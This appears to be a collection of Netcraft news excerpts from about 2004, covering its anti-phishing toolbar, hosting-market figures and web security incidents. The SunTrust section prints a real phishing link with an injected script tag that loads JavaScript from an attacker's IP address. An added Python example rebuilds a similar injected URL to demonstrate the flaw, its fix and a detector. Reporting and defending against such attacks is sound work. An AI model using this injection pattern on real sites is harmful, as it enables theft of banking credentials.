Filtering of some suspicious characters was too aggressive and blocked some URLs on benign sites, including Google and Amazon. We have made an update to the toolbar which will propagate during the course of today.
Thanks for all the reports of phishing sites. If you would like to evangelize the toolbar, encourage friends and relatives that you think might be vulnerable to phishing attacks to use the Toolbar, so that the maximum number of people receive the benefit of these timely reports.
If your preferred desktop operating system can't run the Toolbar until a Firefox version is available, you can report phishing sites directly at http://toolbar.netcraft.com/report_url
Anandtech and Wininformant quickly published reviews of the toolbar yesterday, here and here. There was also some television coverage in the US.
Everyone here is delighted by your enthusiasm and encouragement.
Installing the Netcraft Toolbar
Downloading and installing the Netcraft Toolbar is quick and simple:
- Follow this link to download the toolbar.
- When you see a prompt asking if you want to open the file or save it to your computer, press the "Open" button.
- The Netcraft Toolbar Setup Wizard will now appear. Follow the on-screen prompts to install the toolbar.
- Open Internet Explorer and click the right-hand mouse button over the toolbar area.
- In the menu that appears, ensure that there is a tick next to the 'Netcraft Toolbar' item. If there is not, click the left-hand mouse button over the item and the toolbar should appear.
Using the Toolbar Effectively
The Netcraft Toolbar provides you with constantly updated information about the sites you visit, as well as blocking dangerous sites.
Once the toolbar is installed, Internet Explorer should look similar to this:
As you can see, the site used in this example is http://toolbar.netcraft.com.
When you visit a site, the following information will be displayed in the toolbar (unless the page has been blocked, like this one):
- The "rank" (popularity amongst toolbar users) of the site, linking to the top site listings.
- A link to the site report for the current site.
- The flag (if available) and the two-letter ISO code for the country in which the site is hosted; in this case it is hosted in [UK] (United Kingdom).
- The name of the netblock on which the site is hosted (in this case, the Rackspace.com Netblock). This also links to a listing of sites on the same netblock.
If you attempt to visit a page that has been blocked, you will see a warning dialog which looks similar to this:
Getting the Most from the Netcraft Toolbar
The toolbar provides you with a wealth of information about the sites you visit. This information will help you make an informed choice about the integrity of those sites. Here is a brief list of points you should be aware of when visiting a site which requires you to enter personal information of any kind:
- Look at the toolbar to see whether the site's netblock is registered to the company you expect.
- Look at the country code and flag on the Toolbar to check that the site is hosted in the country that you expect. There is a list of countries which are often used to host fraud sites here.
- Request a site report on the site and check the following:
- Who is the site's domain registered to? Be suspicious if this is not the organisation you expect.
- Who is running the DNS and reverse DNS for the site? Be suspicious if these are not run by a host in a domain controlled by the organisation.
- How new is the site? All other things being equal, the longer a site has been around, the more you can trust it. "New Site" means the site you are currently visiting has not been seen before by the Netcraft Web Server Survey. This indicates that the site is probably less than one month old. Phishing sites spring up overnight and disappear just as quickly, and you should be extremely suspicious if you see this when visiting what you believe to be a trustworthy site.
- Does it have an SSL Certificate? Bank sites that take authentication details will do this over SSL. Details of the SSL Certificate (if any) will appear in the site report.
- Is the site in the DNS? If the site has no hostname or domain name and is a raw IP address be very suspicious.
- If you are convinced that the site is a phishing site, please report it. If you are unable to report the URL via the toolbar site, please send us the entire mail message intact as an attachment. If you use Outlook you can do this by composing a new mail to toolbar@netcraft.com and dragging the fraud mail on to it as an attachment.
- Netcraft will send a reward to the first person to report each new phishing site.
Note that the Toolbar shows that the site is hosted in the USA, at "Inktomi Corporation", and that the site is new. The real SunTrust web site is hosted in the USA at SunTrust Service Corporation.
Comparing the site reports is also telling; the fraudulent site's report contains many 'unknowns' whereas the site report for the real SunTrust web site shows plausible domain registration and DNS details.
You can find out more about reporting URLs in the tutorial on reporting a suspicious URL.
Reporting a Suspicious URL
When you visit a page that you believe to be a phishing site, or contains fraudulent or deceptive content, we ask that you report it so that other toolbar users will benefit from your vigilance. The more sites that are reported, the more useful the toolbar will become for everyone.
You can report a URL by clicking on "Report a Phishing Site" in the toolbar menu, accessed by clicking on the Netcraft logo:
After you report a URL, Netcraft analysts will examine the report and block the page if they find it has inappropriate content.
You can practice blocking an attack by:
- Requesting a sample of a fictional phishing attack mail.
- Visiting the URL contained in the mail that you receive.
- Clicking on the Netcraft logo in the toolbar.
- Selecting "Report a Phishing Site" in the menu that appears.
- URLs from fictional phishing attack mails will be blocked automatically.
- You can test that the URL has been blocked by re-visiting it after reporting.
The Toolbar also mobilizes the Netcraft community into a giant neighbourhood-watch scheme, empowering the most alert and experienced members to protect the vulnerable against fraud and phishing attacks.
Toolbar features include:
- Clear display of sites' hosting location at all times helps you validate fraudulent URLs (e.g. the main online banking site of a large US bank is unlikely to be hosted in the former Soviet Union).
- Once you report a phishing URL, it is blocked for other community members subsequently accessing it. The leverage of widely disseminated attacks (people constructing phishing attacks send literally millions of electronic mails in the expectation that some will reach customers of the bank) is utilized to expedite blocking of the fraud site.
- Natively traps cross-site scripting and other suspicious URLs containing characters which have no common purpose other than to deceive.
- Netcraft supervisor validation is used to contain the impact of any false reporting of URLs.
- Display of browser navigational controls (toolbar & address bar) in all windows, to defend against pop-up windows which attempt to hide the navigational controls to disguise location.
- Happily coexists with Google and other Toolbars.
The Netcraft Toolbar is available now. Please download and try out the toolbar, and let us have your opinions.

If you would like to have a version of the Netcraft Toolbar branded for your organisation, please get in touch. The toolbar can be used to keep your site navigation within view of your customers throughout the time they spend using the web. Dynamically updating navigation provides the facility to change URLs or menu structure and bring new and temporal information to customers' attention at any time.
Microsoft has retired NT4, which was introduced in September 1996, and will cease security updates on Dec. 31, along with pay-per-incident support. Microsoft recently said it will offer only custom support to users of Windows NT 4.0 Server after Jan. 1. As a result, the number of holdouts running web sites on NT4 has been dwindling. Only 1.4 percent of web-facing hostnames run on Windows NT4/98, according to this month's Web Server Survey, down from 5.3 percent at the start of 2003.
Retail chain Kroger was the last remaining Fortune 100 company on Windows NT4, but is now serving its site on Windows Server 2003 (IIS6) while using NetBSD for front-end caching or load balancing.
The UK's FTSE 100 is not as far along, with six member companies still using NT4, following retailer Next PLC's Christmas Eve upgrade to Windows Server 2003. While Britain's banks have urged customers to update their computers, several large financial firms (including Lloyds TSB, Legal & General and F&C Asset Management) continue to run their public web sites on Windows NT4. Other FTSE 100 firms continuing to use NT4 include Tomkins, Allied Dome and BB&G.
Another NT4 user is Diebold, the security firm whose systems are widely used in bank cash machines and electronic voting.
Netcraft monitors over 23K hostnames for the top 1.5K Enterprises (Fortune 1K, FT European 500, FT Asia Pacific, FT Japan, FT Eastern Europe) on a monthly basis, providing details of web technology. Contact us for details of the commercial dataset.
The Santy worm is written in Perl, and exploits a flaw in a file called viewtopic.php that allows an SQL injection exploit, in which SQL database commands typed into a web form can be executed. The worm defaces the web site with the phrase "This site is defaced!!! NeverEver NoSanity" and then seeks out other phpBB sites to attack, apparently using Google to locate the target viewtopic.php files. A Google search for the file currently returns more than 4 million results, while an MSN search lists more than 37,000 appearances of the defacement. Internet security firms are issuing public requests for Google to block these searches to limit the spread of the worm.
Go Daddy has experienced explosive growth in 2004, ending the year with 2.9 million web-facing hostnames, as measured by our Hosting Provider Switching Analysis. It also expanded aggressively into shared hosting and SSL certificates. But its leadership in the domain business hasn't given the Scottsdale, Ariz. provider the name recognition of Yahoo or Interland, two of its chief competitors in the small business hosting market.
"We have the best value proposition of any registrar ... We didn't understand why everybody doesn't do business with us," Go Daddy CEO Bob Parsons told Clickz.com. "We commissioned some market research six months ago, took a hard look at people who aren't doing business with us, and concluded that they aren't aware of us. So what better way to enter (an awareness campaign) than to use the Super Bowl?"
The phpBB development team has notified users of the exploit, which was published on the BugTraq mailing list and several web sites. "This is not a phpBB exploit or problem, it's a PHP issue and thus can affect any PHP script which uses the noted functions," the phpBB advisory said, urging users and hosting providers to upgrade their PHP installations. Similar advice is being offered by the PHP project site, which has fixed the bugs in versions 4.3.10 and 5.0.3.
PHP, an open source server-side scripting language, is widely used to power web applications that connect with databases such as MySQL, and is commonly bundled with shared hosting accounts offered by web hosting providers. phpBB is among the web's most popular bulletin board programs, with more than 156,000 registered members of its user forum.
The server load issues have affected "a number of web hosts," according to Six Apart's Jay Allen, and are "especially evident in shared hosting environments." Allen said the problems are tied to two bugs that cause Movable Type to rebuild posts even when no pages are being changed, allowing comment spam attacks to tie up server resources. Six Apart is promising a fix within 48 hours.
Comment spam, also known as link spam, is believed to boost a site's ranking in Google, which uses inbound links as a measure of a site's popularity. Spammers are using automated scripts to bombard weblogs with comments that include links to sites offering prescription drugs or porn. While weblogs on all platforms have been affected, Movable Type and its mt-comments.cgi script have become a particular target.
The CIRA warned .ca domain owners about the scam, which sends emails originating from the address complaince@cira.cc, rather than the group's official compliance email address, compliance at cira.ca. The use of such "look-alike" domains has become common in phishing scams targeting financial institutions. The scam email says the CIRA is "exercising our right to verify the registrant information." This tactic mimics legitimate emails sent in recent weeks by numerous registrars, who sought to verify account information ahead of an ICANN rule change.
Notably, the five hosting providers that gained more than 100K active sites during 2004 did so entirely through organic growth, rather than acquisitions. Leading the pack was German giant 1&1 Internet, which expanded into the American market even as it continued to gain customers in Europe. Next is The Planet, which experienced a huge year as it found a product positioning sweet spot with its customizable menus of managed services atop dedicated servers.
The Teles hosting brands, which we group under Tect AG for measurement purposes, house more than 1.1 million active sites and 2.2 million hostnames. Freenet said it was particularly interested in Tect's success in dedicated hosting, one of the fastest-growing and most profitable sectors of the hosting business. Tect added 1,383 servers in the six-month period between April and October, growing 45 percent in that period, according to our Hosting Provider Server Count.
The cost of a security lapse goes beyond the direct financial losses and the "headline risk" of adverse publicity, as regulators and lawmakers are paying attention as well. "As phishing attacks are indeed a potential risk, regulators examine the processes used to combat such attacks to determine if they are appropriate to the risk," said Robert Wicksell of the U.S. Office of the Comptroller of the Currency (OCC), who said banking regulators are "highly focused on this issue."
A key question is whether financial sites' defenses are adequate against known threats such as cross-site scripting, the technique used to exploit the SunTrust site. A similar weakness was found in the Bank One web site on Thursday. The incidents come five months after numerous e-commerce sites were proven vulnerable to cross-site scripting attacks by an online demo that inserted content into the web sites of MasterCard and Barclays, among others.
Yahoo has slashed its domain name pricing to $4.98 a year through Dec. 31, continuing a pricing war among major hosting companies. The aggressive move comes just four months after Yahoo dropped its price to $9.95 a year as part of a major push to expand its share of the shared hosting market.
The new pricing undercuts previous leader 1&1 Internet by nearly a dollar. While 1&1 operates its own ICANN-accredited registry, Yahoo continues to operate as a reseller for Melbourne IT, the Australian domain name registry that focuses on the wholesale market. While it's not known precisely what Yahoo is paying per domain, few registrars offer domains to resellers at prices below $6.50 per domain. Since it is likely selling at a loss, Yahoo has limited the offer to one domain per customer, preventing arbitrage-related bulk purchases by owners of large domain portfolios.
Yahoo's move may be a response to Interland, a major competitor in the small business hosting market, which last month lowered its domain name pricing to $7.95 a year, and was immediately rewarded with a one-month gain of 132K hostnames.
www.georgewbush.com switches to self-hosted FreeBSD server, www.sun.com upgrades to Solaris 9, not 10
While response times have improved since moving to FreeBSD, www.georgewbush.com is simply redirecting visitors to the Republican National Committee web site at www.gop.com; however, making an HTTP 1.0 request to www.georgewbush.com causes it to serve the "Test Page for Apache Installation" instead of instructing the browser to redirect to www.gop.com.
www.georgewbush.com continues to block access based on geographical location. A dynamically updating chart of site performance for www.georgewbush.com is available here
Another notable change was observed on Sun Microsystems’ web site at www.sun.com, which was upgraded from Solaris 8 to Solaris 9 on Nov 30. Sun's tardy approach to running the latest version of Solaris on www.sun.com - Solaris 10 was recently released - is in sharp contrast to Microsoft, who ran www.microsoft.com on Windows 2003 for months ahead of its launch.
Yesterday should have been a day for headlines about progress in the battle against phishing scams. Instead, the news was dominated by a new threat that drove home the need for vigilance on the anti-phishing frontier.
Seeking swifter action against fast-moving phishing scams, some of the Internet's best-known service providers announced plans to share phishing attack data with one another and law enforcement agencies through Digital Phishnet. But even as this anti-phishing dream team was being unveiled, security researchers revealed a security hole that makes it easier for phishing operations to inject content into legitimate web sites.
Secunia documented a cross-browser security flaw that is likely to be rapidly adopted by phishing operations. The technique uses a specially-crafted link to a legitimate website, which then enables the scammer to place content into pop-up windows opened during the session - including data collection forms that spoof the design of the legitimate site.
A decision by MacDailyNews to shift its web site from Mac OS X to Linux has highlighted the fact that many prominent sites for Macintosh users are hosted on either Linux or FreeBSD.
Mac enthusiast sites hosted on Linux include MacDailyNews, MacWorld and MacCentral. Running on FreeBSD are MacintoshOS, MacMinute and the entire Mac News Network group of sites, including MacSurfer, Apple Insider, Mac Observer and the MacNN main site.
Only about 60K hostnames worldwide are currently hosted on the Mac OS, and just eight hosting firms house more than 1,000 Mac-based hostnames. The largest, with 4K hostnames, is Natel.net, an ISP in Fairfield, Iowa.
This makes the fraud much more convincing than traditional phishing mails, as the URL the SunTrust customer clicks on actually runs from the SunTrust site before loading JavaScript from the fraudster's server, located in Korea.
The JavaScript then changes the title of the page to "Suntrust Online Banking - Account Verification" and sets the window status to "Suntrust Online Banking", thereby preventing suspicious URLs from being displayed when the victim hovers their mouse cursor over a hyperlink. An 'iframe' is used to insert a form onto the page, which asks the customer to enter their Social Security number and SunTrust banking details. When the form is submitted, it is processed by a PHP script, allowing the attacker to capture the account details.
The phishing emails received by Netcraft contain the following HTML to create a hyperlink to the SunTrust web site:

```html
<a href="http://www.suntrust.com/onlinestatements/index.asp?AccountVerify=df4g653432fvfdsGFSg45wgSVFwfvfVDFS54v54g5F42f543ff5445wv54w&promo=%22%3E%3Cscript+language%3Djavascript+src%3D%22http%3A%2F%2F%3211%2E1%375%2E176%2E179%2Fsun%2Fsun%2Ejs%22%3E%3C%2FSCRIPT%3E)http://www.suntrust.com/onlinestatements/index.asp?AccountVerify=df4g653432fvfdsGFSg45wgSVFwfvfVDFS54v54g5F42f543ff5445wv54w&promo=%22%3E%3Cscript+language%3Djavascript+src%3D%22http%3A%2F%2F%3211%2E1%375%2E176%2E179%2Fsun%2Fsun%2Ejs%22%3E%3C%2FSCRIPT%3E" target="_blank">click here.</td></tr></table></a>
```

One of the parameters supplied to the page is not properly encoded when the SunTrust site displays it, which allows an attacker to inject arbitrary HTML, including JavaScript which is executed by customers' web browsers. The script-bearing portion of the URL (the `promo` parameter, which unnecessarily appears twice) causes the following script to be inserted into the page:

```html
<script language=javascript src="http://211.175.176.179/sun/sun.js"></SCRIPT>
```

This in turn executes the JavaScript which is responsible for altering the contents of the page.
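The following Python is an added illustration, not code from Netcraft or SunTrust: it shows the reflected-parameter defect described above beside its output-encoding fix, and a toolbar-style client check that decodes query values and flags injected script while leaving ordinary URLs alone (the false-positive concern from the toolbar update at the top of the page). The sample URLs are constructed for the example and `attacker.example` is a placeholder host.

```python
"""Two sides of the SunTrust-style reflected XSS described above.

render_promo_field() shows the server-side defect and its fix;
flag_injected_params() is a toolbar-style client check that decodes query
values and flags script injection without blocking ordinary URLs.  Sample
URLs are constructed for this example; ATTACKER_HOST is a placeholder.
"""
import html
import re
from urllib.parse import parse_qsl, unquote, urlsplit

ATTACKER_HOST = "attacker.example"  # placeholder host for the constructed sample


def render_promo_field(promo: str, escape: bool) -> str:
    """Reflect the 'promo' query value into an HTML attribute.

    escape=False reproduces the defect: the raw value is concatenated into the
    attribute, so a value beginning with '">' closes the attribute and the tag,
    and everything after it is parsed as markup (here, a <script> tag).
    escape=True applies the fix: HTML-escape the value, quotes included.
    """
    value = html.escape(promo, quote=True) if escape else promo
    return f'<input type="hidden" name="promo" value="{value}">'


# Markup that has no common purpose in a query value other than injection.
_INJECTION_RE = re.compile(r"<\s*script\b|<\s*iframe\b|javascript\s*:", re.IGNORECASE)


def flag_injected_params(url: str, max_decode_rounds: int = 3) -> list[str]:
    """Return the names of query parameters whose decoded value carries markup.

    parse_qsl() removes one layer of percent-encoding; the loop peels off
    further layers so double-encoded payloads are also caught.  Long opaque
    tokens such as session IDs or catalogue references are not flagged.
    """
    flagged = []
    for name, value in parse_qsl(urlsplit(url).query, keep_blank_values=True):
        for _ in range(max_decode_rounds):
            decoded = unquote(value)
            if decoded == value:
                break
            value = decoded
        if _INJECTION_RE.search(value):
            flagged.append(name)
    return flagged


def reflected_promo(url: str) -> str:
    """Extract the decoded 'promo' value exactly as the vulnerable page sees it."""
    return dict(parse_qsl(urlsplit(url).query)).get("promo", "")


# Constructed link with the same shape as the one in the phishing mail.
INJECTED_URL = (
    "http://www.suntrust.com/onlinestatements/index.asp?AccountVerify=df4g653432"
    "&promo=%22%3E%3Cscript+language%3Djavascript+src%3D%22http%3A%2F%2F"
    + ATTACKER_HOST + "%2Fsun%2Fsun%2Ejs%22%3E%3C%2FSCRIPT%3E"
)
# Constructed benign URL carrying oddly encoded but harmless values.
BENIGN_URL = "http://www.amazon.com/exec/obidos/ASIN/B000012345?ref=nosim%2Fsearch&tag=a%3Db"


if __name__ == "__main__":
    promo = reflected_promo(INJECTED_URL)
    print("unsafe:", render_promo_field(promo, escape=False))
    print("fixed: ", render_promo_field(promo, escape=True))
    print("flagged in phishing link:", flag_injected_params(INJECTED_URL))
    print("flagged in benign link:  ", flag_injected_params(BENIGN_URL))
```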
Fraudsters have noticed opportunities in SunTrust's internet banking operations previously, and a similar attack was executed in September.
Careless application errors and inadequate testing are believed to be an industry-wide problem for internet banking, and even though it would seem to the man in the street appalling that someone could run a fraud from a bank's own site, SunTrust competitors are unlikely to be strongly critical through fear of similar problems with their own facilities.
Netcraft has highlighted the threat of cross site scripting and script injection used for fraud, and provides a range of services for banks and other financial institutions to try and eliminate these kinds of errors from their systems, including comprehensive application testing and training for developers and designers of web based applications.
"Lycos has decided to close down its Make Love, Not Spam website," said spokesperson Malte Pollmann. "The aim of the campaign was to ignite a debate about anti-spam measures. We feel that we have achieved this through our activity and will now continue that debate with others in the email industry. We hope that this will lead to further new and innovative solutions to the problem of spam."
The company also says a published list of sites affected by traffic from the screensaver represented "historic data" and not ongoing activity. Netcraft used the list as a guide in analyzing the screensaver's impact, monitoring three sites which Lycos cited as being hardest hit by its campaign. Our analysis found two of the three sites cited by MakeLoveNotSpam were not available, and attributed this status to traffic generated by the screensaver. Lycos Europe says its attacks on those particular sites had already ceased.
During November all of the sites monitored experienced some failed requests, with New York Internet the most reliable site during the period, followed by Pair Networks.
Half of the top ten sites were running BSD-based operating systems, with four running Linux, and hosting.com (née Express Technologies) running Windows.
The site has shifted IP addresses from 83.241.136.230 to 213.115.182.123, which are both housed at the web servers of Starring, a Swedish advertising agency which is apparently working with Lycos Europe on the site.
Many users have reported problems accessing the web site since it was announced a few days ago. At first, these difficulties were thought to be as a result of the web site's success or revenge attacks by spammers. It now appears that some major Internet backbones are denying access to the IP address used to host www.MakeLoveNotSpam.com. Tracing a route to the host from Netcraft's main site in the UK reveals that access to the MakeLoveNotSpam.com site has been blackholed by Global Crossing's worldwide network, leaving the site accessible from some areas but not others:
A dynamically updating chart of site performance for MakeLoveNotSpam.com is available here.
While Internet users debate the ethics of the initiative, Lycos Europe is denying reports that the MakeLoveNotSpam site was hacked and defaced last night. An intrusion by hackers would be a serious concern for an operation that controls an army of computers with DDoS capabilities. The site has been unreachable today, which could be related to traffic from Slashdot rather than a counterattack.
Lycos Europe is offering a "screensaver that spams the spammers," using idle computer time to attack sites that have been blacklisted for abusive spamming practices. Monitoring of three of the targets housed on Chinese servers shows that two of the sites, bokwhdok.com and printmediaprofits.biz, have been knocked offline by the attack. A third target, rxmedherbals.info, has remained largely available, with intermittent outages.

In the December 2004 survey we received responses from 56,923,737 sites. The gain of 808,722 sites continues the Internet's powerful growth as a medium for communications and commerce, which has continued at near-record pace in 2004 despite a steady drumbeat of security threats.
Trends contributing to the expansion include the growth of retail e-commerce and online banking, as well as lower prices for domain names. Domain registrars and hosting companies say small businesses have been active purchasers of domains and web sites, suggesting that the Internet's benefits as a business tool have overcome fears about Internet security, which are often cited as a factor in delayed adoption of the Web by some small businesses.
In 2004 the Web has emulated the financial market model of "climbing a wall of worry," averaging 911,000 new sites a month amid a wave of security incidents. Prominent security headlines featured the MyDoom DDoS, the Witty worm, a TCP security hole, the spread of the Download.Ject exploit through web sites, a JPEG-based attack, an IFRAME exploit spread through banner ad networks (November), and a year-long surge in phishing attacks.
Trends in the web server sector continue apace, with both Apache and Microsoft gaining sites as their shares hold steady.
| Developer | November 2004 | Percent | December 2004 | Percent | Change |
|---|---|---|---|---|---|
| Apache | 38028642 | 67.77 | 38614673 | 67.84 | 0.07 |
| Microsoft | 11923566 | 21.25 | 12062761 | 21.19 | -0.06 |
| Sun | 1761705 | 3.14 | 1812966 | 3.18 | 0.04 |
| Zeus | 739006 | 1.32 | 687508 | 1.21 | -0.11 |